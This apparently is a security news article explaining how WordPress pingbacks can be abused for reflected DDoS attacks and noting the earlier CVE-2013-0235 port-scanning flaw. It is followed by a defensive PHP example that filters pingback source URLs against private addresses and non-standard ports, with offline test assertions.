In a recent report, we wrote about another DDoS method using DNS amplification, where a DNS request is made to an open DNS resolver with the source IP address forged to be that of the targeted site, so that the response is sent to the target; this new method uses HTTP rather than DNS.

The attack makes use of a feature in the WordPress blogging platform called 'pingback', which allows the author of one blog to send a 'ping' to a post on another blog to notify the latter that it has been referenced. It turns out that most WordPress sites are susceptible to this abuse, since the feature is enabled by default and there is no protection mechanism within WordPress against it.

The pingback mechanism has been known to be a security risk for some time. Late last year a similar vulnerability was discovered that could turn third-party blogs into a powerful port-scanning engine. That vulnerability (CVE-2013-0235) was fixed in WordPress 3.5.1 by applying some filtering on allowed URLs.

However, in this case the requests do not appear to be amplified, which means the attackers would have to control a large botnet for such attacks to be successful. Incapsula also added that all websites using Incapsula are protected from such abuse.
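The "filtering on allowed URLs" credited above with closing the port-scanning variant is worth seeing in code. The following is an added example, not WordPress's own implementation, of that kind of check applied to the pingback "source" URI before the receiving site fetches it: only public http/https origins on the standard ports pass, so the server cannot be steered at loopback, private or link-local address space, or at arbitrary ports. The resolver is injectable so the checks run offline against constructed DNS records:

```php
<?php
// Added example, not WordPress's code: allowed-URL policy for a pingback source
// URI, of the kind the article says closed CVE-2013-0235. Constructed DNS data;
// the default resolver is an assumption (A records only).

function is_safe_pingback_source(string $url, ?callable $resolve = null): bool
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host']) || empty($parts['scheme'])) {
        return false;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;                                  // no file://, gopher://, ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;                                  // credentials embedded in URL
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return false;                                  // the port-scanning abuse
    }
    $host = strtolower(trim($parts['host'], '[]'));   // strip IPv6 brackets
    if (in_array($host, ['localhost', 'localhost.localdomain'], true)) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $addresses = [$host];                          // literal IP in the URL
    } else {
        // Default resolver: A records only (assumption; add AAAA lookups in production).
        $resolve ??= fn(string $h): array => gethostbynamel($h) ?: [];
        $addresses = $resolve($host);
    }
    if ($addresses === []) {
        return false;                                  // unresolvable host
    }
    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 and fc00::/7;
        // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1 and similar.
        // Every record must be public, so a name that mixes public and private
        // addresses is refused too.
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return false;
        }
    }
    return true;
}

// Constructed DNS records so the checks below do no network lookups.
$fake_dns = fn(string $host): array => [
    'blog.example.org'     => ['203.0.113.5'],
    'intranet.example.org' => ['10.0.0.12'],
    'mixed.example.org'    => ['203.0.113.6', '192.168.1.1'],
][$host] ?? [];

assert(is_safe_pingback_source('http://blog.example.org/2013/post', $fake_dns) === true);
assert(is_safe_pingback_source('http://intranet.example.org/', $fake_dns) === false);
assert(is_safe_pingback_source('http://mixed.example.org/', $fake_dns) === false);
assert(is_safe_pingback_source('http://127.0.0.1/', $fake_dns) === false);
assert(is_safe_pingback_source('http://203.0.113.5:22/', $fake_dns) === false);
assert(is_safe_pingback_source('ftp://blog.example.org/', $fake_dns) === false);
```

Note what this policy does and does not cover: it stops a pingback receiver from being used as a scanner of its own network, but, as the Incapsula report says, it does nothing against the reflection case, where every source URL is a perfectly public site; that needs rate limiting per target or disabling pingbacks outright.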